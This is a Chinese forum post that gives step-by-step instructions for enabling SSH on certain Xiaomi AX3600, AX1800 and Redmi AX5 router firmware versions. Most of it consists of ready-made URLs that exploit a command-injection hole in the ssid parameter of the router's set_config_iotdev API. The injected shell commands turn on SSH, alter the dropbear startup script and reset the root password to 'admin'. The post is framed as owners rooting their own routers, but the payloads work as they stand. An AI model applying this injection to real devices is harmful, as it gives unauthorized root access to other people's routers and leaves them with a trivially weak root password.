|
|
本帖最后由 haifon 于 2020-6-23 01:53 编辑
AX3600、AX1800、AX5官方固件开启SSH方法——清雨收集并优化,小白版 我恩山第一次发帖子,群里很多人看原帖不会,让我发帖我改下,希望原作者不要怪
详细请看原帖
https://www.right.com.cn/forum/f ... hlight=ax5&mobile=2
有漏洞固件
AX3600 1.0.17版本/AX1800 1.0.34/1.0.328版本/AX5 1.0.16版本;AX3600的1.0.20和1.0.50版本应该已经修复了
AX1800 1.0.34版本固件竟然同样也可用以下方法开启SSH,1.0.328的固件仍然适用,最新的1.0.336未知,有兴趣的同学验证
同样适用于红米AX5,出厂固件1.0.16版本
进入路由复制串号,替换下面的小写stok等号右边的大写<STOK>,带符号一起替换,不要说误人子弟,细心的复制串号就可对比发现
开ssh命令:
http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20nvram%20set%20ssh_en%3D1%3B%20nvram%20commit%3B%20sed%20-i%20's%2Fchannel%3D.*%2Fchannel%3D%5C%22debug%5C%22%2Fg'%20%2Fetc%2Finit.d%2Fdropbear%3B%20%2Fetc%2Finit.d%2Fdropbear%20start%3B
改密码命令(必须改密码,不改密码无法连接ssh):改密码为admin
http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20echo%20-e%20'admin%5Cnadmin'%20%7C%20passwd%20root%3B
改成一行
http://192.168.31.1/cgi-bin/luci/;stok=<STOK>/api/misystem/set_config_iotdev?bssid=Xiaomi&user_id=longdike&ssid=-h%3B%20nvram%20set%20ssh_en%3D1%3B%20nvram%20commit%3B%20sed%20-i%20's%2Fchannel%3D.*%2Fchannel%3D%5C%22debug%5C%22%2Fg'%20%2Fetc%2Finit.d%2Fdropbear%3B%20%2Fetc%2Finit.d%2Fdropbear%20start%3B%20echo%20-e%20'admin%5Cnadmin'%20%7C%20passwd%20root%3B
|
评分
-
查看全部评分
|
/1 
IP卡
狗仔卡
发表于 2020-6-20 21:23
置顶卡
沉默卡
喧嚣卡
顶贴卡
显身卡
